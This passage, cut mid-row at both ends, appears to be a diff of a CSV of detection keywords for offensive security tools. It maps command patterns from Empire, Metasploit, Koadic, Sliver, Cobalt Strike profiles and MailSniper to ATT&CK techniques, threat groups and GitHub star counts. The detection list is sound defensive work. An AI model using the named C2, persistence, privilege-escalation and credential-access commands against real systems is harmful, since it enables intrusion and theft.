Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*upload-dll * *.dll*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*UploadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*UrbanBishop.exe*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*UrbanBishop.exe*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*ursnif_IcedID.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*USBPcap*","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" -"*use exploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*use exploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*use implant/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*use incognito*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*use powershell_stageless*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*use safetykatz*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*use stager/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*UseBeaconCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*UseBeaconCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*uselistener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*uselistener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - 
T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*usemodule persistence/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*usemodule powershell/persistence*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*usemodule privesc/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*usemodule persistence/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*usemodule powershell/persistence*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*usemodule privesc/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*useplugin csharpserver*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
-"*UsePrtAdminAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
-"*UsePrtImperonsationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
-"*user Inveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*UsePrtAdminAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*UsePrtImperonsationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*user Inveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - 